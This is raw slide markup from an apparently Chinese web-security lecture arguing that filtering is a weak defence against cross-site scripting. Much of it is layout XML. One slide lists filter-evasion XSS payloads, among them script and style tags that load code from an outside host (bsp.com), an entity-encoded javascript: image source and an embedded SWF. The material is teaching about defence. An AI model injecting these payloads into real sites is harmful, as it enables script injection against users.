                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;html&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    &lt;head&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;title&gt;XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>测试</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>title&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    &lt;/head&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    &lt;body&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>页面内容：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>input type="text" name="age" value=""&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    &lt;/body&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/html&gt;</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reeform 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3951288"/>
            <a:ext cx="8550275" cy="1439862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5386"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T9" fmla="*/ 0 h 822"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T13" fmla="*/ 0 h 822"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T22" fmla="*/ 0 w 5386"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 822"/>
              <a:gd name="T24" fmla="*/ 0 w 5386"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 8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86"/>
              <a:gd name="T40" fmla="*/ 0 h 822"/>
              <a:gd name="T41" fmla="*/ 5386 w 5386"/>
              <a:gd name="T42" fmla="*/ 822 h 8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86" h="822">
                <a:moveTo>
                  <a:pt x="0" y="198"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="312" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="822" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332" y="198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1899" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806" y="198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4309" y="226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848" y="226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFDE51">
              <a:alpha val="10196"/>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50179" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2640013"/>
            <a:ext cx="8550275" cy="1800225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5386"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T5" fmla="*/ 0 h 993"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T21" fmla="*/ 0 h 993"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T46" fmla="*/ 0 w 5386"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 993"/>
              <a:gd name="T48" fmla="*/ 0 w 5386"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 9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86"/>
              <a:gd name="T76" fmla="*/ 0 h 993"/>
              <a:gd name="T77" fmla="*/ 5386 w 5386"/>
              <a:gd name="T78" fmla="*/ 993 h 9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86" h="993">
                <a:moveTo>
                  <a:pt x="0" y="29"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="397" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2013" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2750" y="482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3118" y="312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3572" y="312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3940" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4422" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848" y="964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4309" y="964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543" y="766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806" y="936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1899" y="766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332" y="936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="822" y="993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFDE51">
              <a:alpha val="25098"/>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50180" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2103438"/>
            <a:ext cx="8550275" cy="1619250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5386"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T19" fmla="*/ 0 h 1020"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 5386"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T54" fmla="*/ 0 w 5386"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 1020"/>
              <a:gd name="T56" fmla="*/ 0 w 5386"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 10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86"/>
              <a:gd name="T88" fmla="*/ 0 h 1020"/>
              <a:gd name="T89" fmla="*/ 5386 w 5386"/>
              <a:gd name="T90" fmla="*/ 1020 h 10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86" h="1020">
                <a:moveTo>
                  <a:pt x="0" y="57"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="85" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1616" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2835" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3827" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4110" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4621" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5386" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046" y="935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4422" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4281" y="539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3940" y="964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3572" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3118" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2750" y="1020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2013" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644" y="964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361" y="794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFDE51">
              <a:alpha val="45097"/>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50181" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="8550275" cy="720725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5358"/>
              <a:gd name="T1" fmla="*/ 0 h 454"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T3" fmla="*/ 0 h 454"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5358"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T30" fmla="*/ 0 w 5358"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 454"/>
              <a:gd name="T32" fmla="*/ 0 w 5358"/>
              <a:gd name="T33" fmla="*/ 0 h 4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58"/>
              <a:gd name="T52" fmla="*/ 0 h 454"/>
              <a:gd name="T53" fmla="*/ 5358 w 5358"/>
              <a:gd name="T54" fmla="*/ 454 h 4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58" h="454">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5216" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4904" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4592" y="312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4082" y="199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3799" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1616" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFDE51">
              <a:alpha val="67058"/>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50182" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>过滤是最低效的方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50183" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="1294284"/>
            <a:ext cx="8208963" cy="328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eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>如果只采用过滤，很难考虑完备：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="872481" name="Group 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="314325" y="1836738"/>
          <a:ext cx="8551863" cy="3573464"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8551863"/>
              </a:tblGrid>
              <a:tr h="530225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1800"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx1"/>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&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;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34975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1800"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="30000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx1"/>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&lt;SCRIPT SRC=http://bsp.com/xss.js&gt;&lt;/SCRIPT&gt;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71475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="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&lt;IMG SRC=</a:t>
                      </a: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JaVaScRiPt:alert</a:t>
                      </a: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(&amp;</a:t>
                      </a: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quot;XSS&amp;quot</a:t>
                      </a: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;)&gt;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¼script¾alert(¢XSS¢)¼/script¾</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" alt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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="de-DE"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&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;</a:t>
                      </a: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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="de-DE"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&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</a:t>
                      </a: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8300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="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&lt;STYLE&gt;@</a:t>
                      </a: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import'http</a:t>
                      </a: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bsp.com</a:t>
                      </a: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xss.css</a:t>
                      </a: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';&lt;/STYLE&gt;</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="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74650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="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&lt;EMBED SRC=http://bsp.com/xss.swf </a:t>
                      </a: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AllowScriptAccess</a:t>
                      </a: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="always"&gt;&lt;/EMBED&gt;</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="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84175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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pPr>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"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50198" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5562600"/>
